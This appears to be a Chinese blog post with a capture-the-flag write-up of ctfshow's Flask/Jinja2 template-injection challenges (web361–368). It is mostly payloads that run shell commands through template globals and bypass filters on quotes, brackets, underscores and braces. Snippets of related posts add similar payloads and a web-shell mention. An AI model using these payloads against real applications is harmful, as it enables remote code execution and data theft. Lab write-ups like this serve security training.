ctfshow-web入门-ssti

最新推荐文章于 2024-07-15 17:01:50 发布
最新推荐文章于 2024-07-15 17:01:50 发布
阅读量414 收藏 11
点赞数 9
文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/K_kiii/article/details/136768719
版权

web361

没有做任何过滤

?name={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}

出现了flag,然后cat../flag即可


?name={{ config.__class__.__init__.__globals__['os'].popen('cat ../flag').read() }}

web362

过滤了数字,上一题的payload依旧可以用

web363

过滤了单双引号,可以利用request.args.变量名结构

?name={{a.__init__.__globals__[request.args.x].eval(request.args.y)}}&x=__builtins__&y=__import__("os").popen("cat /flag").read()

web364

过滤了引号和args。

虽然不能get传参,但是可以用cookie。基本模式就是request.cookies.变量名,再抓包添加即可。

?name={{a.__init__.__globals__[request.cookies.x].eval(request.cookies.y)}}//get传参
x=__builtins__;y=__import__("os").popen("cat /flag").read() //添加在cookie里

web365

过滤了[]

引入__getitem__调用字典中的键值,比如说a['b']就可以用a.getitem('b')来表示,成功绕过[]

?name={{a.__init__.__globals__.__getitem__(request.cookies.x).eval(request.cookies.y)}}
cookie:x=__builtins__;y=__import__("os").popen("cat /flag").read()

web366

过滤了_

所有类似于__init__这样的方法都不能用了,那只是name传参不能用,但是我们可以用cookie来传参。使用flask框架自带的attr过滤器。attr用于获取变量。

?name={{(lipsum|attr(request.cookies.x)).os.popen(request.cookies.y).read()}}
 
Cookie:a=__globals__;b=cat /flag

web367

过滤了os,那我们就把os写进cookie里,改一下上面的payload;

?name={{(lipsum|attr(request.cookies.x)).get(request.cookies.y).popen(request.cookies.z).read()}}
 
Cookie:x=__globals__;y=os;z=cat /flag

web368

过滤了{{

使用{%%}绕过,再借助print()回显

?name={% print((abc|attr(request.cookies.a)|attr(request.cookies.b)|attr(request.cookies.c))(request.cookies.d).eval(request.cookies.e))%}

Cookie:a=__init__;b=__globals__;c=__getitem__;d=__builtins__;e=__import__('os').popen('cat /flag').read()

K_kki
关注
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
2401_84252281的博客
04-26 983
任务环境说明:服务器场景:Server1。
ctfshow-web364(SSTI)
m0_62094846的博客
04-30 556
用上题的方法,发现还是有东西被过滤了 筛选后发现是args 过滤了引号和args,上题的姿势不能用了,但是可以用chr()函数绕过。 可以用这个payload判断chr()函数的位置: {{().__class__.__bases__[0].__subclasses__()[§0§].__init__.__globals__.__builtins__.chr}} 用bp跑后发现有这几个,可以任意取 取80 分析一下别人的wp(现在的水平也只能这样了) ?name={%...
ctfshow web入门(SSRF)
qq_53263789的博客
07-19 859
ctfshow
ctfshow-web入门-php特性(web109-web115)
最新发布
Welcome To Myon'Blog !
07-15 1131
php 中查看目录的函数有:scandir()、golb()、dirname()、basename()、realpath()、getcwd() ,其中 scandir()、golb() 、dirname()、basename()、realpath() 都需要给定参数,而 getcwd() 不需要参数,getchwd() 函数会返回当前工作目录。对于 trim() 函数会去除空格( %20)、制表符(%09)、换行符(%0a)、回车符(%0d)、空字节符(%00)、垂直制表符(%0b),
CTFSHOW~WEB入门
ing_end的博客
01-21 1302
WEB~4(2022.1.16) 看题目,提示我们查看robots.txt文件 注:什么是robots.txt文件?   搜索引擎通过一种程序robot(又称spider),自动访问互联网上的网页并获取网页信息。   您可以在您的网站中创建一个纯文本文件robots.txt,在这个文件中声明该网站中不想被robot访问的部分,这样,该网站的部分或全部内容就可以不被搜索引擎收录了,或者指定搜索引擎只收录指定的内容。 robots.txt文件放在哪里? robots.txt文件应该放在...
CTFShow-Web入门
weixin_58546222的博客
12-04 2364
CTFShow-信息收集
ctfshow-web365(SSTI)
m0_62094846的博客
05-05 311
这次是把args [ 和' 过滤了 有两种方式可以绕过[ 可以用__getitem__和pop代替,因为pop会破坏数组的结构,所以更推荐用__getitem__ ?name={%set+chr=[].__class__.__bases__[0].__subclasses__()[80].__init__.__globals__.__builtins__.chr%}{{[].__class__.__base__.__subclasses__()[132].__init__.__globals__
CTFshow-SSTI
Leo8283的博客
04-25 326
在CTFWEB入门的路上一直感恩有这么多大佬博文帮忙 第一步了解了ssti是个什么东西,做题时就要看大佬的解题博客,比较清晰能串联知识点 CTFshow做题 ssti做题逻辑 测试:name={{1%2b1}} %2b是加号,不能用+,一定要编码,因为+在url中会被当做空格 存在ssti: 查看当前类:{{''.__class__}} 查看当前类的所属类:{{''.__class__.__bases__}} 或者类的解析顺序{{''.__class__.__mro__}} 找到object基类
CTF-WEB入门DOC-2019版1
08-03
【CTF-WEB入门DOC-2019版1】主要涵盖了CTF竞赛与Web安全相关的基础知识和进阶技能,适合对网络安全有兴趣,尤其是希望在Web安全领域发展的人群。以下将详细介绍其中的关键知识点: 一、CTF简介及目标: CTF...
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
ctfshow-web入门-信息搜集(web11-web20)
Welcome To Myon'Blog !
06-02 1406
X探针:又名刘海探针、X-Prober,是一款由 INN STUDIO 原创主导开发的开源 PHP 探针,拥有美观简洁的界面、极高的运行效率和极低的资源占用,能高精度显示服务器的相应信息。php 探针:用来探测空间、服务器运行状况和 PHP 信息,探针可以实时查看服务器硬盘资源、内存占用、网卡流量、系统负载、服务器时间等信息。雅黑 php 探针:每秒更新,不用刷网页,适用于Linux系统,可以实时查看服务器硬盘资源、内存占用、网卡流量、系统负载、服务器时间等信息。
ctfshow-web入门-信息搜集(web1-web10)
Welcome To Myon'Blog !
05-31 769
勇师傅还是想打 CTF。
ctfshow-web入门-命令执行(web56、web57、web58)
Welcome To Myon'Blog !
06-29 824
由于前面说的只有 -1,因此我们对 36 进行取反,得到 -37,对 -37 再次取反即可得到 36。这里说了 flag 在 36.php,那么我们只需要构造 36,但是数字被过滤了。根据 $((~ $(()) ))=-1,我们进行拼接,构造出 -37。命令执行,需要严格的过滤,已测试,可绕。
CTFShow-WEB入门篇--信息搜集详细Wp
Aluxian_的博客
06-02 2648
CTFShow-WEB入门篇--信息搜集详细Wp
ctfshow-web入门-命令执行(web30-web36)
Welcome To Myon'Blog !
06-06 1073
命令执行,需要严格的过滤。
ctfshow-web入门-文件上传(web166、web167)&(web168-web170)免杀绕过
Welcome To Myon'Blog !
07-11 1085
查看源码,前端只让传 zip上传 zip 成功后可以进行下载随便搞一个压缩包,使用记事本编辑,在其内容里插入一句话木马:上传该压缩包,上传成功后点击下载文件,使用 burpsuite 抓包:我这里木马内容用的 request ,就在 get 里执行 ls 没什么问题,但是读取 flag 时识别有点问题,最好使用 post 请求,因此将请求方法改为 post ,将 file 的内容还原到上面。
网络安全最全ctfshow web入门 SSTI(1)
2401_84301853的博客
05-04 603
使用Popen类来执行cat /flag命令,这个命令通常用于读取名为flag的文件。8.调用read()方法来读取Popen对象的输出,即cat /flag命令的输出。payload。
ctfshow ssti
07-27
CTFShow SSTI(Server-Side Template Injection)是一个与安全相关的话题,它涉及到服务器端模板注入漏洞。在某些情况下,当应用程序接受用户输入并将其作为模板的一部分进行解析时,攻击者可以利用这个漏洞来执行...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值